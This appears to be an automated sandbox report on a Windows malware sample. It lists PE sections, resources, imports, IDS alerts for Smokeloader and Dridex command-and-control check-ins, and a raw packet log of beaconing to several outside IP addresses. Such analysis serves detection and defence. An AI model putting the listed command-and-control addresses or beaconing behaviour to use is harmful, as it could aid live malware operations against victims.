                                                                                                                            mov eax, dword ptr [0041E008h]
                                                                                                                            mov dword ptr [ebp-00000328h], eax
                                                                                                                            mov eax, dword ptr [0041E00Ch]
                                                                                                                            mov dword ptr [ebp-00000324h], eax
                                                                                                                            call dword ptr [000000D0h]
                                                                                                                            Programming Language:
                                                                                                                            • [C++] VS2008 build 21022
                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                            • [LNK] VS2008 build 21022
                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1c85c0x50.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x11b0000x1def0.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x1c4880x18.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x1a0.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x193cf0x194008d95907f8b9395a69c809ab7d99ce1c9False0.7846341274752475data7.463605198956065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rdata0x1b0000x21e20x2200b9571ef10137704c48bf54f76c2f1908False0.36960018382352944data5.568963977856118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .data0x1e0000xf92980x1a0039b06b99939919014d4d1e31861e5a45False0.24323918269230768data2.5259560682729396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .ruyohel0x1180000x7c0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .tls0x1190000x51d0x60053e979547d8c2ea86560ac45de08ae25False0.013020833333333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .rihogi0x11a0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .rsrc0x11b0000x1def00x1e0005cefed6a88213e7e6d656ea4676fd3d9False0.4099039713541667data4.992130300436512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            AFX_DIALOG_LAYOUT0x12de080x2data5.0
                                                                                                                            BAJOMIZINIXAPENEKIPOHOGAMIPACEF0x12da080x3faASCII text, with very long lines (1018), with no line terminatorsTurkishTurkey0.6296660117878192
                                                                                                                            VOWEFUHAVAXEHARASIDIXERASANA0x12ce100xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.5977799542931767
                                                                                                                            RT_CURSOR0x12de100x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                                            RT_CURSOR0x12df400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                                            RT_CURSOR0x1305100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                                            RT_CURSOR0x1313d00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                                            RT_CURSOR0x1315000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                                            RT_ICON0x11bb200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5706289978678039
                                                                                                                            RT_ICON0x11c9c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6466606498194946
                                                                                                                            RT_ICON0x11d2700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6941244239631337
                                                                                                                            RT_ICON0x11d9380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7536127167630058
                                                                                                                            RT_ICON0x11dea00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5223029045643154
                                                                                                                            RT_ICON0x1204480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.625234521575985
                                                                                                                            RT_ICON0x1214f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.639344262295082
                                                                                                                            RT_ICON0x121e780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.776595744680851
                                                                                                                            RT_ICON0x1223580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39898720682302774
                                                                                                                            RT_ICON0x1232000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5582129963898917
                                                                                                                            RT_ICON0x123aa80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6163594470046083
                                                                                                                            RT_ICON0x1241700x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6408959537572254
                                                                                                                            RT_ICON0x1246d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.44136960600375236
                                                                                                                            RT_ICON0x1257800x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.43975409836065577
                                                                                                                            RT_ICON0x1261080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4796099290780142
                                                                                                                            RT_ICON0x1265d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.39818763326226014
                                                                                                                            RT_ICON0x1274800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.4972924187725632
                                                                                                                            RT_ICON0x127d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5253456221198156
                                                                                                                            RT_ICON0x1283f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5491329479768786
                                                                                                                            RT_ICON0x1289580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.3487551867219917
                                                                                                                            RT_ICON0x12af000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37640712945590993
                                                                                                                            RT_ICON0x12bfa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.3971311475409836
                                                                                                                            RT_ICON0x12c9300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.4175531914893617
                                                                                                                            RT_STRING0x133c780x392data0.47045951859956237
                                                                                                                            RT_STRING0x1340100x724data0.4217724288840263
                                                                                                                            RT_STRING0x1347380x602data0.43953185955786733
                                                                                                                            RT_STRING0x134d400x788data0.41804979253112035
                                                                                                                            RT_STRING0x1354c80x6b4data0.43356643356643354
                                                                                                                            RT_STRING0x135b800x842data0.42147587511825924
                                                                                                                            RT_STRING0x1363c80x72adata0.42202835332606325
                                                                                                                            RT_STRING0x136af80x82edata0.41881566380133717
                                                                                                                            RT_STRING0x1373280x6cedata0.4305396096440873
                                                                                                                            RT_STRING0x1379f80x624data0.4395674300254453
                                                                                                                            RT_STRING0x1380200x77edata0.424400417101147
                                                                                                                            RT_STRING0x1387a00x642data0.4307116104868914
                                                                                                                            RT_STRING0x138de80x104data0.5269230769230769
                                                                                                                            RT_GROUP_CURSOR0x1304e80x22data1.088235294117647
                                                                                                                            RT_GROUP_CURSOR0x1313b80x14data1.25
                                                                                                                            RT_GROUP_CURSOR0x133aa80x22data1.088235294117647
                                                                                                                            RT_GROUP_ICON0x12cd980x76dataTurkishTurkey0.6694915254237288
                                                                                                                            RT_GROUP_ICON0x1222e00x76dataTurkishTurkey0.6610169491525424
                                                                                                                            RT_GROUP_ICON0x1265700x68dataTurkishTurkey0.7115384615384616
                                                                                                                            RT_VERSION0x133ad00x1a8data0.5872641509433962
                                                                                                                            DLLImport
                                                                                                                            KERNEL32.dllGetConsoleAliasesLengthW, GetNumaProcessorNode, GetConsoleAliasExesLengthA, WaitForSingleObject, InterlockedCompareExchange, FreeEnvironmentStringsA, GetModuleHandleW, ReadConsoleW, FormatMessageA, SetCommState, GetEnvironmentStrings, GetVolumeInformationA, FatalAppExitW, CopyFileW, GetSystemTimeAdjustment, WriteConsoleOutputA, HeapDestroy, GetFileAttributesA, SetConsoleMode, GetBinaryTypeA, GetStdHandle, SetPriorityClass, GetProcAddress, GetLongPathNameA, BuildCommDCBW, LoadLibraryA, LocalAlloc, MoveFileA, QueryDosDeviceW, CreatePipe, GetModuleFileNameA, GetDefaultCommConfigA, GetModuleHandleA, GetCommTimeouts, FreeEnvironmentStringsW, WriteConsoleOutputAttribute, FindAtomW, CreateFileA, SetStdHandle, GetLastError, GetComputerNameA, HeapFree, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, WriteFile, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetFilePointer, CloseHandle
                                                                                                                            USER32.dllGetFocus
                                                                                                                            ADVAPI32.dllObjectPrivilegeAuditAlarmA
                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            TurkishTurkey
                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-10-03T02:52:23.786088+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449736190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:24.904716+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449737190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:26.182658+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449738190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:27.283559+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449739190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:28.391966+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449740190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:30.168698+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449741190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:31.286466+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449742190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:32.378001+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449743190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:33.467881+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449744190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:34.595323+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449745190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:35.763792+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449746190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:36.903395+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449747190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:38.030099+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449748190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:39.129458+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449749190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:41.272613+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449750190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:42.384476+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449751190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:43.560652+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449752190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:44.667910+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449753190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:45.777403+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449754190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:46.914017+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449755190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:48.014248+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449756190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:49.132178+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449757190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:50.225515+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449758190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:51.419382+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449759190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:52.746812+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449760190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:55.089069+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449763190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:56.197435+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449764190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:57.297018+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449765190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:58.428777+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449766190.219.117.24080TCP
                                                                                                                            2024-10-03T02:52:59.545775+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449767190.219.117.24080TCP
                                                                                                                            2024-10-03T02:53:17.311199+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976823.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:17.662722+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44976823.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:17.816351+02002829848ETPRO MALWARE SmokeLoader encrypted module (3)223.145.40.162443192.168.2.449768TCP
                                                                                                                            2024-10-03T02:53:18.822466+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976923.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:19.181475+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44976923.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:19.796874+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977023.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:20.075572+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44977023.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:20.702172+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977123.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:20.989913+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44977123.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:21.627296+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977223.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:21.908752+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44977223.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:22.504515+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977323.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:22.783712+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44977323.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:23.621205+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977423.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:23.899735+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44977423.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:24.505897+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977523.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:24.778948+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44977523.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:25.432551+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977623.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:25.666516+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44977623.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:26.279216+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977723.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:26.548436+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44977723.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:27.149314+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977823.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:27.429508+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44977823.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:28.117408+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977923.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:28.411820+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44977923.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:29.105071+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44978023.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:29.382194+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44978023.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:29.986819+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44978123.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:30.255048+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44978123.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:31.633961+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44978223.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:31.913190+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44978223.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:32.525840+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44978323.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:32.807619+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44978323.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:33.464530+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44978423.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:33.727819+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44978423.145.40.162443TCP
                                                                                                                            2024-10-03T02:53:37.932180+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44978523.145.40.162443TCP
                                                                                                                            2024-10-03T02:54:09.019446+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449786190.219.117.24080TCP
                                                                                                                            2024-10-03T02:54:15.778409+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449787190.219.117.24080TCP
                                                                                                                            2024-10-03T02:54:24.178713+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449788190.219.117.24080TCP
                                                                                                                            2024-10-03T02:54:31.831285+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449789190.219.117.24080TCP
                                                                                                                            2024-10-03T02:54:41.494607+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449790190.219.117.24080TCP
                                                                                                                            2024-10-03T02:54:53.531734+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44979123.145.40.162443TCP
                                                                                                                            2024-10-03T02:54:53.771450+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44979123.145.40.162443TCP
                                                                                                                            2024-10-03T02:54:56.654275+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449792201.212.52.19780TCP
                                                                                                                            2024-10-03T02:55:09.647073+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44979323.145.40.162443TCP
                                                                                                                            2024-10-03T02:55:09.932594+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44979323.145.40.162443TCP
                                                                                                                            2024-10-03T02:55:14.179610+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449794201.212.52.19780TCP
                                                                                                                            2024-10-03T02:55:27.283552+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44979523.145.40.162443TCP
                                                                                                                            2024-10-03T02:55:27.953196+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44979523.145.40.162443TCP
                                                                                                                            2024-10-03T02:55:31.392173+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449796201.212.52.19780TCP
                                                                                                                            2024-10-03T02:55:44.012872+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44979723.145.40.162443TCP
                                                                                                                            2024-10-03T02:55:44.353405+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44979723.145.40.162443TCP
                                                                                                                            2024-10-03T02:55:49.226473+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449798201.212.52.19780TCP
                                                                                                                            2024-10-03T02:56:00.601332+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44979923.145.40.162443TCP
                                                                                                                            2024-10-03T02:56:00.871816+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44979923.145.40.162443TCP
                                                                                                                            2024-10-03T02:56:07.147321+02002019082ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND1192.168.2.44980023.145.40.113443TCP
                                                                                                                            2024-10-03T02:56:07.152005+02002019082ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND1192.168.2.44980023.145.40.113443TCP
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Oct 3, 2024 02:52:22.476536989 CEST4973680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:22.481908083 CEST8049736190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:22.482006073 CEST4973680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:22.482182026 CEST4973680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:22.482213974 CEST4973680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:22.487565994 CEST8049736190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:22.489447117 CEST8049736190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:23.779000044 CEST8049736190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:23.785785913 CEST8049736190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:23.786087990 CEST4973680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:23.786453009 CEST4973680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:23.788961887 CEST4973780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:23.791316986 CEST8049736190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:23.794239998 CEST8049737190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:23.794311047 CEST4973780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:23.794410944 CEST4973780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:23.794430017 CEST4973780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:23.799364090 CEST8049737190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:23.799478054 CEST8049737190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:24.904617071 CEST8049737190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:24.904661894 CEST8049737190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:24.904716015 CEST4973780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:24.964818954 CEST4973780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:24.970120907 CEST8049737190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:24.983676910 CEST4973880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:24.988768101 CEST8049738190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:24.988838911 CEST4973880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:24.989859104 CEST4973880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:24.989871025 CEST4973880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:24.994679928 CEST8049738190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:24.994875908 CEST8049738190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:26.182543993 CEST8049738190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:26.182596922 CEST8049738190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:26.182626009 CEST8049738190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:26.182657957 CEST4973880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:26.182682991 CEST4973880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:26.183301926 CEST4973880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:26.185656071 CEST4973980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:26.188066959 CEST8049738190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:26.190712929 CEST8049739190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:26.191755056 CEST4973980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:26.191899061 CEST4973980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:26.191916943 CEST4973980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:26.197212934 CEST8049739190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:26.197254896 CEST8049739190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:27.275322914 CEST8049739190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:27.283198118 CEST8049739190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:27.283559084 CEST4973980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:27.283559084 CEST4973980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:27.285726070 CEST4974080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:27.288734913 CEST8049739190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:27.290668964 CEST8049740190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:52:27.290759087 CEST4974080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:27.290863037 CEST4974080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:27.290905952 CEST4974080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:52:27.295705080 CEST8049740190.219.117.240192.168.2.4
